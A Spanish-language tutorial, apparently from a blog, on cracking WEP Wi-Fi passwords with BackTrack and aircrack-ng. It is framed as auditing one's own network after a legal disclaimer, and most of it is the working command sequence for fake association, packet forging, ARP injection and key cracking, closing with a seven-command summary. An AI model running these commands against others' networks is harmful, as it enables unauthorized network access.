Antes de empezar con el tutorial decir que saltarse redes WiFi con algún tipo de cifrado es un delito, y lo que aquí muestra Jordi es un tutorial de como probar la seguridad, auditoría, en nuestras redes WiFi, disfrutad del tutorial.
Hoy os vamos a mostrar una de las infinitas utilidades de Backtrack, concretamente la de vulnerar el protocolo WEP de las wifis. Como muchos ya sabréis, todavía a día de hoy gran parte de los routers cedidos por las ISP traen la wifi activada, y lo que es peor, protegida con una simple contraseña WEP. Veremos lo fácil que resulta vulnerarla.
Para empezar arrancaremos nuestra BT, en este caso en su cuarta versión desde una máquina virtual o directamente desde el Live cd.
“Arrancando la interfaz gráfica tras el login”
Ahora abriremos una shell y con el comando iwconfig pondremos nuestra tarjeta de red en modo Monitor y le bajaremos el rate a 1Mb.
Teniendo ya nuestra tarjeta de red preparada, procederemos a la caza de una red inalámbrica poco segura. Para ello utilizaremos el comando airodump-ng que nos muestra entre otras cosas todas las redes wifi cercanas a nosotros.
El primer paso consiste en hacer una falsa asociación de nuestro equipo con el router. Para ello utilizaremos el potencial de aireplay-ng y su atributo -1 con el que lograremos ésa autentificación:
aireplay-ng -1 0 -a BSSID -h LOCALMAC INT
Donde INT es el nombre de nustra interface de red, en este caso Wlan0
Una vez autentificados en la red, crearemos un paquete válido para posteriormente ser reinyectado y así generar tráfico.
aireplay-ng -5 -b BSSID -h LOCALMAC INT
Con éste segundo comando y tras encontrar un paquete válido nos pedirá confirmación, que se la daremos con Y y el enter. Inmediatamente después de indicarle que “si queremos usar ese paquete”, en la ventana de la Shell nos aparecerá un mensaje diciéndonos que se ha creado un nuevo archivo con extensión .xor.
Por último y antes de empezar a generar tráfico “falso” en nuestra wifi crearemos el paquete mágico con la siguiente orden:
packetforge-ng -0 -a BSSID -h LOCALMAC -k 255.255.255.255 -l
255.255.255.255 -y Nombre_del_archivo_creado.xor -w arp-request
Finalmente y tras la respuesta que nos indica que se ha escrito el paquete en arp-request, vamos a la parte importante de todo esto!
Abrimos tres pestañas diferentes de shell pues ahora necesitaremos que se ejecuten 3 órdenes de manera paralela.
En la primera de ellas dejaremos nuestro ordenador capturando todo el tráfico que pase por el canal específico de nuestra wifi con la siguiente orden:
airodump-ng -c CH -w capture INT
aireplay-ng -2 -r arp-request INT
Y por último en la tercera shell abriremos Aircrack-ng para crackear todo el tráfico que estamos generando con el fin de descubrir la contraseña de la red inalámbrica.
Tras escoger la wlan deseada, solamente tendremos que esperar. En cuestión de minutos tendremos la contraseña en pantalla.
Aunque os haya parecido algo bastante largo y complicado es un proceso que se puede llevar a cabo en menos de 10 minutos. En realidad todo ello se puede simplificar en 7 simples comandos que aquí os resumo:
- Iwconfig INT mode monitor rate 1M channel CH
- aireplay-ng -1 0 -a BSSID -h LOCALMAC INT
- aireplay-ng -4 INT -h LOCALMAC
- packetforge-ng -0 -a BSSID -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y NOMDELXORCREAT.xor -w arp-request
- airodump-ng -c CH -w capture INT
- aireplay-ng -2 -r arp-request INT
- aircrack-ng -z *.cap
SOURCE